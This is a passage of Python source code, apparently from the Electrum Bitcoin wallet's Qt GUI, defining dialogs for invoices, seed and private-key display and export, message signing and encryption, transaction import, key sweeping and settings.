grid.addWidget(QLabel(outputs_str), 2, 1) grid.addWidget(QLabel(_("Description") + ':'), 3, 0) grid.addWidget(QLabel(invoice.message), 3, 1) if invoice.exp: grid.addWidget(QLabel(_("Expires") + ':'), 4, 0) grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1) if invoice.bip70: pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70)) pr.verify(self.contacts) grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0) grid.addWidget(QLabel(pr.get_requestor()), 5, 1) grid.addWidget(QLabel(_("Signature") + ':'), 6, 0) grid.addWidget(QLabel(pr.get_verify_status()), 6, 1) def do_export(): key = pr.get_id() name = str(key) + '.bip70' fn = getSaveFileName( parent=self, title=_("Save invoice to file"), filename=name, filter="*.bip70", config=self.config, ) if not fn: return with open(fn, 'wb') as f: data = f.write(pr.raw) self.show_message(_('BIP70 invoice saved as {}').format(fn)) exportButton = EnterButton(_('Export'), do_export) buttons = Buttons(exportButton, CloseButton(d)) else: buttons = Buttons(CloseButton(d)) vbox.addLayout(grid) vbox.addLayout(buttons) d.exec_() def 
show_lightning_invoice(self, invoice: LNInvoice): lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP) d = WindowModalDialog(self, _("Lightning Invoice")) vbox = QVBoxLayout(d) grid = QGridLayout() grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0) grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1) grid.addWidget(QLabel(_("Amount") + ':'), 1, 0) amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit() grid.addWidget(QLabel(amount_str), 1, 1) grid.addWidget(QLabel(_("Description") + ':'), 2, 0) grid.addWidget(QLabel(invoice.message), 2, 1) grid.addWidget(QLabel(_("Hash") + ':'), 3, 0) payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex()) payhash_e.addCopyButton(self.app) payhash_e.setReadOnly(True) vbox.addWidget(payhash_e) grid.addWidget(payhash_e, 3, 1) if invoice.exp: grid.addWidget(QLabel(_("Expires") + ':'), 4, 0) grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1) vbox.addLayout(grid) invoice_e = ShowQRTextEdit(config=self.config) invoice_e.addCopyButton(self.app) invoice_e.setText(invoice.invoice) vbox.addWidget(invoice_e) vbox.addLayout(Buttons(CloseButton(d),)) d.exec_() def create_console_tab(self): from .console import Console self.console = console = Console() return console def update_console(self): console = self.console console.history = self.wallet.db.get("qt-console-history", []) console.history_index = len(console.history) console.updateNamespace({ 'wallet': self.wallet, 'network': self.network, 'plugins': self.gui_object.plugins, 'window': self, 'config': self.config, 'electrum': electrum, 'daemon': self.gui_object.daemon, 'util': util, 'bitcoin': bitcoin, 'lnutil': lnutil, }) c = commands.Commands( config=self.config, daemon=self.gui_object.daemon, network=self.network, callback=lambda: self.console.set_json(True)) methods = {} def mkfunc(f, method): return lambda *args, **kwargs: f(method, args, self.password_dialog, **{**kwargs, 'wallet': self.wallet}) for m in dir(c): if m[0]=='_' or m in ['network','wallet','config','daemon']: continue methods[m] = mkfunc(c._run, m) console.updateNamespace(methods) def create_status_bar(self): sb = QStatusBar() sb.setFixedHeight(35) self.balance_label = QLabel("Loading wallet...") self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse) self.balance_label.setStyleSheet("""QLabel { padding: 0 }""") sb.addWidget(self.balance_label) self.search_box = QLineEdit() self.search_box.textChanged.connect(self.do_search) self.search_box.hide() sb.addPermanentWidget(self.search_box) self.update_check_button = QPushButton("") self.update_check_button.setFlat(True) self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor)) self.update_check_button.setIcon(read_QIcon("update.png")) self.update_check_button.hide() sb.addPermanentWidget(self.update_check_button) self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog) sb.addPermanentWidget(self.password_button) sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog)) self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog) sb.addPermanentWidget(self.seed_button) self.lightning_button = None if self.wallet.has_lightning(): self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog) self.update_lightning_icon() sb.addPermanentWidget(self.lightning_button) self.status_button = None if self.network: self.status_button = 
StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog) sb.addPermanentWidget(self.status_button) run_hook('create_status_bar', sb) self.setStatusBar(sb) def create_coincontrol_statusbar(self): self.coincontrol_sb = sb = QStatusBar() sb.setSizeGripEnabled(False) #sb.setFixedHeight(3 * char_width_in_lineedit()) sb.setStyleSheet('QStatusBar::item {border: None;} ' + ColorScheme.GREEN.as_stylesheet(True)) self.coincontrol_label = QLabel() self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred) self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse) sb.addWidget(self.coincontrol_label) clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None)) clear_cc_button.setStyleSheet("margin-right: 5px;") sb.addPermanentWidget(clear_cc_button) sb.setVisible(False) return sb def set_coincontrol_msg(self, msg: Optional[str]) -> None: if not msg: self.coincontrol_label.setText("") self.coincontrol_sb.setVisible(False) return self.coincontrol_label.setText(msg) self.coincontrol_sb.setVisible(True) def update_lightning_icon(self): if self.lightning_button is None: return if self.network is None or self.network.channel_db is None: self.lightning_button.setVisible(False) return self.lightning_button.setVisible(True) cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate() # self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}") progress_str = "??%" if progress_percent is not None: progress_str = f"{progress_percent}%" if progress_percent and progress_percent >= 100: self.lightning_button.setMaximumWidth(25) self.lightning_button.setText('') self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced.")) else: self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit()) self.lightning_button.setText(progress_str) self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n" "Payments are more likely to succeed with a more complete graph.")) def update_lock_icon(self): icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png") self.password_button.setIcon(icon) def update_buttons_on_seed(self): self.seed_button.setVisible(self.wallet.has_seed()) self.password_button.setVisible(self.wallet.may_have_password()) def change_password_dialog(self): from electrum.storage import StorageEncryptionVersion if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD: from .password_dialog import ChangePasswordDialogForHW d = ChangePasswordDialogForHW(self, self.wallet) ok, encrypt_file = d.run() if not ok: return try: hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption() except UserCancelled: return except BaseException as e: self.logger.exception('') self.show_error(repr(e)) return old_password = hw_dev_pw if self.wallet.has_password() else None new_password = hw_dev_pw if encrypt_file else None else: from .password_dialog import ChangePasswordDialogForSW d = ChangePasswordDialogForSW(self, self.wallet) ok, old_password, new_password, encrypt_file = d.run() if not ok: return try: self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file) except InvalidPassword as e: self.show_error(str(e)) return except BaseException: self.logger.exception('Failed to update password') self.show_error(_('Failed to update password')) return msg = _('Password was updated successfully') if 
self.wallet.has_password() else _('Password is disabled, this wallet is not protected') self.show_message(msg, title=_("Success")) self.update_lock_icon() def toggle_search(self): self.search_box.setHidden(not self.search_box.isHidden()) if not self.search_box.isHidden(): self.search_box.setFocus(1) else: self.do_search('') def do_search(self, t): tab = self.tabs.currentWidget() if hasattr(tab, 'searchable_list'): tab.searchable_list.filter(t) def new_contact_dialog(self): d = WindowModalDialog(self, _("New Contact")) vbox = QVBoxLayout(d) vbox.addWidget(QLabel(_('New Contact') + ':')) grid = QGridLayout() line1 = QLineEdit() line1.setFixedWidth(32 * char_width_in_lineedit()) line2 = QLineEdit() line2.setFixedWidth(32 * char_width_in_lineedit()) grid.addWidget(QLabel(_("Address")), 1, 0) grid.addWidget(line1, 1, 1) grid.addWidget(QLabel(_("Name")), 2, 0) grid.addWidget(line2, 2, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if d.exec_(): self.set_contact(line2.text(), line1.text()) def init_lightning_dialog(self): if self.question(_( "Warning: this wallet type does not support channel recovery from seed. " "You will need to backup your wallet everytime you create a new wallet. " "Create lightning keys?")): self.wallet.init_lightning() self.show_message("Lightning keys created. Please restart Electrum") def show_wallet_info(self): dialog = WindowModalDialog(self, _("Wallet Information")) dialog.setMinimumSize(800, 100) vbox = QVBoxLayout() wallet_type = self.wallet.db.get('wallet_type', '') if self.wallet.is_watching_only(): wallet_type += ' [{}]'.format(_('watching-only')) seed_available = _('True') if self.wallet.has_seed() else _('False') keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()] grid = QGridLayout() basename = os.path.basename(self.wallet.storage.path) grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0) grid.addWidget(QLabel(basename), 0, 1) grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0) grid.addWidget(QLabel(wallet_type), 1, 1) grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0) grid.addWidget(QLabel(self.wallet.txin_type), 2, 1) grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0) grid.addWidget(QLabel(str(seed_available)), 3, 1) if len(keystore_types) <= 1: grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0) ks_type = str(keystore_types[0]) if keystore_types else _('No keystore') grid.addWidget(QLabel(ks_type), 4, 1) # lightning grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0) from .util import IconLabel if self.wallet.has_lightning(): if self.wallet.lnworker.has_deterministic_node_id(): grid.addWidget(QLabel(_('Enabled')), 5, 1) else: label = IconLabel(text='Enabled, non-recoverable channels') label.setIcon(read_QIcon('nocloud')) grid.addWidget(label, 5, 1) if self.wallet.db.get('seed_type') == 'segwit': msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum. " "This means that you must save a backup of your wallet everytime you create a new channel.\n\n" "If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed") else: msg = _("Your channels cannot be recovered from seed. 
" "This means that you must save a backup of your wallet everytime you create a new channel.\n\n" "If you want to have recoverable channels, you must create a new wallet with an Electrum seed") grid.addWidget(HelpButton(msg), 5, 3) grid.addWidget(QLabel(_('Lightning Node ID:')), 7, 0) # TODO: ButtonsLineEdit should have a addQrButton method nodeid_text = self.wallet.lnworker.node_keypair.pubkey.hex() nodeid_e = ButtonsLineEdit(nodeid_text) qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png" nodeid_e.addButton(qr_icon, lambda: self.show_qrcode(nodeid_text, _("Node ID")), _("Show QR Code")) nodeid_e.addCopyButton(self.app) nodeid_e.setReadOnly(True) nodeid_e.setFont(QFont(MONOSPACE_FONT)) grid.addWidget(nodeid_e, 8, 0, 1, 4) else: if self.wallet.can_have_lightning(): grid.addWidget(QLabel('Not enabled'), 5, 1) button = QPushButton(_("Enable")) button.pressed.connect(self.init_lightning_dialog) grid.addWidget(button, 5, 3) else: grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1) grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2) vbox.addLayout(grid) labels_clayout = None if self.wallet.is_deterministic(): keystores = self.wallet.get_keystores() ks_stack = QStackedWidget() def select_ks(index): ks_stack.setCurrentIndex(index) # only show the combobox in case multiple accounts are available if len(keystores) > 1: def label(idx, ks): if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'): return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}' else: return _("keystore") + f' {idx+1}' labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())] on_click = lambda clayout: select_ks(clayout.selected_index()) labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click) vbox.addLayout(labels_clayout.layout()) for ks in keystores: ks_w = QWidget() ks_vbox = QVBoxLayout() ks_vbox.setContentsMargins(0, 0, 0, 0) ks_w.setLayout(ks_vbox) mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config) mpk_text.setMaximumHeight(150) mpk_text.addCopyButton(self.app) run_hook('show_xpub_button', mpk_text, ks) der_path_hbox = QHBoxLayout() der_path_hbox.setContentsMargins(0, 0, 0, 0) der_path_hbox.addWidget(QLabel(_("Derivation path") + ':')) der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown")) der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse) der_path_hbox.addWidget(der_path_text) der_path_hbox.addStretch() ks_vbox.addWidget(QLabel(_("Master Public Key"))) ks_vbox.addWidget(mpk_text) ks_vbox.addLayout(der_path_hbox) ks_stack.addWidget(ks_w) select_ks(0) vbox.addWidget(ks_stack) vbox.addStretch(1) btn_export_info = run_hook('wallet_info_buttons', self, dialog) btn_close = CloseButton(dialog) btns = Buttons(btn_export_info, btn_close) vbox.addLayout(btns) dialog.setLayout(vbox) dialog.exec_() def remove_wallet(self): if self.question('\n'.join([ _('Delete wallet file?'), "%s"%self.wallet.storage.path, _('If your wallet contains funds, make sure you have saved its seed.')])): self._delete_wallet() @protected def _delete_wallet(self, password): wallet_path = self.wallet.storage.path basename = os.path.basename(wallet_path) r = self.gui_object.daemon.delete_wallet(wallet_path) self.close() if r: self.show_error(_("Wallet removed: {}").format(basename)) else: self.show_error(_("Wallet file not found: {}").format(basename)) @protected def show_seed_dialog(self, password): if not self.wallet.has_seed(): self.show_message(_('This 
wallet has no seed')) return keystore = self.wallet.get_keystore() try: seed = keystore.get_seed(password) passphrase = keystore.get_passphrase(password) except BaseException as e: self.show_error(repr(e)) return from .seed_dialog import SeedDialog d = SeedDialog(self, seed, passphrase, config=self.config) d.exec_() def show_qrcode(self, data, title = _("QR code"), parent=None, *, help_text=None, show_copy_text_btn=False): if not data: return d = QRDialog( data=data, parent=parent or self, title=title, help_text=help_text, show_copy_text_btn=show_copy_text_btn, config=self.config, ) d.exec_() @protected def show_private_key(self, address, password): if not address: return try: pk = self.wallet.export_private_key(address, password) except Exception as e: self.logger.exception('') self.show_message(repr(e)) return xtype = bitcoin.deserialize_privkey(pk)[0] d = WindowModalDialog(self, _("Private key")) d.setMinimumSize(600, 150) vbox = QVBoxLayout() vbox.addWidget(QLabel(_("Address") + ': ' + address)) vbox.addWidget(QLabel(_("Script type") + ': ' + xtype)) vbox.addWidget(QLabel(_("Private key") + ':')) keys_e = ShowQRTextEdit(text=pk, config=self.config) keys_e.addCopyButton(self.app) vbox.addWidget(keys_e) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) d.exec_() msg_sign = _("Signing with an address actually means signing with the corresponding " "private key, and verifying with the corresponding public key. The " "address you have entered does not have a unique public key, so these " "operations cannot be performed.") + '\n\n' + \ _('The operation is undefined. Not just in Electrum, but in general.') @protected def do_sign(self, address, message, signature, password): address = address.text().strip() message = message.toPlainText().strip() if not bitcoin.is_address(address): self.show_message(_('Invalid Bitcoin address.')) return if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return if not self.wallet.is_mine(address): self.show_message(_('Address not in wallet.')) return txin_type = self.wallet.get_txin_type(address) if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']: self.show_message(_('Cannot sign messages with this type of address:') + \ ' ' + txin_type + '\n\n' + self.msg_sign) return task = partial(self.wallet.sign_message, address, message, password) def show_signed_message(sig): try: signature.setText(base64.b64encode(sig).decode('ascii')) except RuntimeError: # (signature) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=show_signed_message) def do_verify(self, address, message, signature): address = address.text().strip() message = message.toPlainText().strip().encode('utf-8') if not bitcoin.is_address(address): self.show_message(_('Invalid Bitcoin address.')) return try: # This can throw on invalid base64 sig = base64.b64decode(str(signature.toPlainText())) verified = ecc.verify_message_with_address(address, sig, message) except Exception as e: verified = False if verified: self.show_message(_("Signature verified")) else: self.show_error(_("Wrong signature")) def sign_verify_message(self, address=''): d = WindowModalDialog(self, _('Sign/verify Message')) d.setMinimumSize(610, 290) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) address_e = QLineEdit() address_e.setText(address) layout.addWidget(QLabel(_('Address')), 2, 0) layout.addWidget(address_e, 
2, 1) signature_e = QTextEdit() signature_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Signature')), 3, 0) layout.addWidget(signature_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Sign")) b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Verify")) b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() @protected def do_decrypt(self, message_e, pubkey_e, encrypted_e, password): if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return cyphertext = encrypted_e.toPlainText() task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password) def setText(text): try: message_e.setText(text.decode('utf-8')) except RuntimeError: # (message_e) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=setText) def do_encrypt(self, message_e, pubkey_e, encrypted_e): message = message_e.toPlainText() message = message.encode('utf-8') try: public_key = ecc.ECPubkey(bfh(pubkey_e.text())) except BaseException as e: self.logger.exception('Invalid Public key') self.show_warning(_('Invalid Public key')) return encrypted = public_key.encrypt_message(message) encrypted_e.setText(encrypted.decode('ascii')) def encrypt_message(self, address=''): d = WindowModalDialog(self, _('Encrypt/decrypt Message')) d.setMinimumSize(610, 490) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) pubkey_e = QLineEdit() if address: pubkey = self.wallet.get_public_key(address) pubkey_e.setText(pubkey) layout.addWidget(QLabel(_('Public key')), 2, 0) layout.addWidget(pubkey_e, 2, 1) encrypted_e = QTextEdit() encrypted_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Encrypted')), 3, 0) layout.addWidget(encrypted_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Encrypt")) b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Decrypt")) b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() def password_dialog(self, msg=None, parent=None): from .password_dialog import PasswordDialog parent = parent or self d = PasswordDialog(parent, msg) return d.run() def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']: from electrum.transaction import tx_from_any try: return tx_from_any(data) except BaseException as e: self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e)) return def import_channel_backup(self, encrypted: str): if not self.question('Import channel backup?'): return try: self.wallet.lnworker.import_channel_backup(encrypted) except Exception as e: self.show_error("failed to import backup" + '\n' + str(e)) return def read_tx_from_qrcode(self): from electrum import qrscanner try: data = qrscanner.scan_barcode(self.config.get_video_device()) except UserFacingException as e: self.show_error(e) return except BaseException as e: self.logger.exception('camera error') self.show_error(repr(e)) return if not data: return # if the user scanned a bitcoin URI if 
data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'): self.pay_to_URI(data) return if data.lower().startswith('channel_backup:'): self.import_channel_backup(data) return # else if the user scanned an offline signed tx tx = self.tx_from_text(data) if not tx: return self.show_transaction(tx) def read_tx_from_file(self) -> Optional[Transaction]: fileName = getOpenFileName( parent=self, title=_("Select your transaction file"), filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY, config=self.config, ) if not fileName: return try: with open(fileName, "rb") as f: file_content = f.read() # type: Union[str, bytes] except (ValueError, IOError, os.error) as reason: self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found")) return return self.tx_from_text(file_content) def do_process_from_text(self): text = text_dialog( parent=self, title=_('Input raw transaction'), header_layout=_("Transaction:"), ok_label=_("Load transaction"), config=self.config, ) if not text: return tx = self.tx_from_text(text) if tx: self.show_transaction(tx) def do_process_from_text_channel_backup(self): text = text_dialog( parent=self, title=_('Input channel backup'), header_layout=_("Channel Backup:"), ok_label=_("Load backup"), config=self.config, ) if not text: return if text.startswith('channel_backup:'): self.import_channel_backup(text) def do_process_from_file(self): tx = self.read_tx_from_file() if tx: self.show_transaction(tx) def do_process_from_txid(self): from electrum import transaction txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':') if ok and txid: txid = str(txid).strip() raw_tx = self._fetch_tx_from_network(txid) if not raw_tx: return tx = transaction.Transaction(raw_tx) self.show_transaction(tx) def _fetch_tx_from_network(self, txid: str) -> Optional[str]: if not self.network: self.show_message(_("You are offline.")) return try: raw_tx = self.network.run_from_another_thread( self.network.get_transaction(txid, timeout=10)) except UntrustedServerReturnedError as e: self.logger.info(f"Error getting transaction from network: {repr(e)}") self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui()) return except Exception as e: self.show_message(_("Error getting transaction from network") + ":\n" + repr(e)) return return raw_tx @protected def export_privkeys_dialog(self, password): if self.wallet.is_watching_only(): self.show_message(_("This is a watching-only wallet")) return if isinstance(self.wallet, Multisig_Wallet): self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' + _('It cannot be "backed up" by simply exporting these private keys.')) d = WindowModalDialog(self, _('Private keys')) d.setMinimumSize(980, 300) vbox = QVBoxLayout(d) msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."), _("Exposing a single private key can compromise your entire wallet!"), _("In particular, DO NOT use 'redeem private key' services proposed by third parties.")) vbox.addWidget(QLabel(msg)) e = QTextEdit() e.setReadOnly(True) vbox.addWidget(e) defaultname = 'electrum-private-keys.csv' select_msg = _('Select file to export your private keys to') hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg) vbox.addLayout(hbox) b = OkButton(d, _('Export')) b.setEnabled(False) vbox.addLayout(Buttons(CancelButton(d), b)) private_keys = {} addresses = self.wallet.get_addresses() done = False cancelled = False 
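# The key export below runs on a worker thread so the dialog stays responsive:
# privkeys_thread exports one key per address into private_keys and emits
# computing_privkeys_signal so the progress text is refreshed from the GUI
# thread, while the done/cancelled flags let the dialog interrupt the worker
# cleanly if it is closed before the export finishes.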
def privkeys_thread(): for addr in addresses: time.sleep(0.1) if done or cancelled: break privkey = self.wallet.export_private_key(addr, password) private_keys[addr] = privkey self.computing_privkeys_signal.emit() if not cancelled: self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.emit() def show_privkeys(): s = "\n".join(map(lambda x: x[0] + "\t"+ x[1], private_keys.items())) e.setText(s) b.setEnabled(True) self.show_privkeys_signal.disconnect() nonlocal done done = True def on_dialog_closed(*args): nonlocal done nonlocal cancelled if not done: cancelled = True self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.disconnect() self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses)))) self.show_privkeys_signal.connect(show_privkeys) d.finished.connect(on_dialog_closed) threading.Thread(target=privkeys_thread).start() if not d.exec_(): done = True return filename = filename_e.text() if not filename: return try: self.do_export_privkeys(filename, private_keys, csv_button.isChecked()) except (IOError, os.error) as reason: txt = "\n".join([ _("Electrum was unable to produce a private key-export."), str(reason) ]) self.show_critical(txt, title=_("Unable to create csv")) except Exception as e: self.show_message(repr(e)) return self.show_message(_("Private keys exported.")) def do_export_privkeys(self, fileName, pklist, is_csv): with open(fileName, "w+") as f: os.chmod(fileName, 0o600) if is_csv: transaction = csv.writer(f) transaction.writerow(["address", "private_key"]) for addr, pk in pklist.items(): transaction.writerow(["%34s"%addr,pk]) else: f.write(json.dumps(pklist, indent = 4)) def do_import_labels(self): def on_import(): self.need_update.set() import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import) def do_export_labels(self): export_meta_gui(self, _('labels'), self.wallet.export_labels) def import_invoices(self): import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update) def export_invoices(self): export_meta_gui(self, _('invoices'), self.wallet.export_invoices) def import_requests(self): import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update) def export_requests(self): export_meta_gui(self, _('requests'), self.wallet.export_requests) def import_contacts(self): import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update) def export_contacts(self): export_meta_gui(self, _('contacts'), self.contacts.export_file) def sweep_key_dialog(self): d = WindowModalDialog(self, title=_('Sweep private keys')) d.setMinimumSize(600, 300) vbox = QVBoxLayout(d) hbox_top = QHBoxLayout() hbox_top.addWidget(QLabel(_("Enter private keys:"))) hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) vbox.addLayout(hbox_top) keys_e = ScanQRTextEdit(allow_multi=True, config=self.config) keys_e.setTabChangesFocus(True) vbox.addWidget(keys_e) addresses = self.wallet.get_unused_addresses() if not addresses: try: addresses = self.wallet.get_receiving_addresses() except AttributeError: addresses = self.wallet.get_addresses() h, address_e = address_field(addresses) vbox.addLayout(h) vbox.addStretch(1) button = OkButton(d, _('Sweep')) vbox.addLayout(Buttons(CancelButton(d), button)) button.setEnabled(False) def get_address(): addr = str(address_e.text()).strip() if bitcoin.is_address(addr): return addr def get_pk(*, raise_on_error=False): text = str(keys_e.toPlainText()) return 
keystore.get_private_keys(text, raise_on_error=raise_on_error) def on_edit(): valid_privkeys = False try: valid_privkeys = get_pk(raise_on_error=True) is not None except Exception as e: button.setToolTip(f'{_("Error")}: {repr(e)}') else: button.setToolTip('') button.setEnabled(get_address() is not None and valid_privkeys) on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet()) keys_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_address) on_address(str(address_e.text())) if not d.exec_(): return # user pressed "sweep" addr = get_address() try: self.wallet.check_address_for_corruption(addr) except InternalAddressCorruption as e: self.show_error(str(e)) raise privkeys = get_pk() def on_success(result): coins, keypairs = result outputs = [PartialTxOutput.from_address_and_value(addr, value='!')] self.warn_if_watching_only() self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs) def on_failure(exc_info): self.on_error(exc_info) msg = _('Preparing sweep transaction...') task = lambda: self.network.run_from_another_thread( sweep_preparations(privkeys, self.network)) WaitingDialog(self, msg, task, on_success, on_failure) def _do_import(self, title, header_layout, func): text = text_dialog( parent=self, title=title, header_layout=header_layout, ok_label=_('Import'), allow_multi=True, config=self.config, ) if not text: return keys = str(text).split() good_inputs, bad_inputs = func(keys) if good_inputs: msg = '\n'.join(good_inputs[:10]) if len(good_inputs) > 10: msg += '\n...' self.show_message(_("The following addresses were added") + f' ({len(good_inputs)}):\n' + msg) if bad_inputs: msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10]) if len(bad_inputs) > 10: msg += '\n...' 
self.show_error(_("The following inputs could not be imported") + f' ({len(bad_inputs)}):\n' + msg) self.address_list.update() self.history_list.update() def import_addresses(self): if not self.wallet.can_import_address(): return title, msg = _('Import addresses'), _("Enter addresses")+':' self._do_import(title, msg, self.wallet.import_addresses) @protected def do_import_privkey(self, password): if not self.wallet.can_import_privkey(): return title = _('Import private keys') header_layout = QHBoxLayout() header_layout.addWidget(QLabel(_("Enter private keys")+':')) header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password)) def update_fiat(self): b = self.fx and self.fx.is_enabled() self.fiat_send_e.setVisible(b) self.fiat_receive_e.setVisible(b) self.history_list.update() self.address_list.refresh_headers() self.address_list.update() self.update_status() def settings_dialog(self): from .settings_dialog import SettingsDialog d = SettingsDialog(self, self.config) self.alias_received_signal.connect(d.set_alias_color) d.exec_() self.alias_received_signal.disconnect(d.set_alias_color) if self.fx: self.fx.trigger_update() run_hook('close_settings_dialog') if d.need_restart: self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success')) def closeEvent(self, event): # It seems in some rare cases this closeEvent() is called twice if not self.cleaned_up: self.cleaned_up = True self.clean_up() event.accept() def clean_up(self): self.wallet.thread.stop() util.unregister_callback(self.on_network) self.config.set_key("is_maximized", self.isMaximized()) if not self.isMaximized(): g = self.geometry() self.wallet.db.put("winpos-qt", [g.left(),g.top(), g.width(),g.height()]) self.wallet.db.put("qt-console-history", self.console.history[-50:]) if self.qr_window: self.qr_window.close() self.close_wallet() self.gui_object.timer.timeout.disconnect(self.timer_actions) self.gui_object.close_window(self) def plugins_dialog(self): self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins')) plugins = self.gui_object.plugins vbox = QVBoxLayout(d) # plugins scroll = QScrollArea() scroll.setEnabled(True) scroll.setWidgetResizable(True) scroll.setMinimumSize(400,250) vbox.addWidget(scroll) w = QWidget() scroll.setWidget(w) w.setMinimumHeight(plugins.count() * 35) grid = QGridLayout() grid.setColumnStretch(0,1) w.setLayout(grid) settings_widgets = {} def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int): widget = settings_widgets.get(name) # type: Optional[QWidget] if widget and not p: # plugin got disabled, rm widget grid.removeWidget(widget) widget.setParent(None) 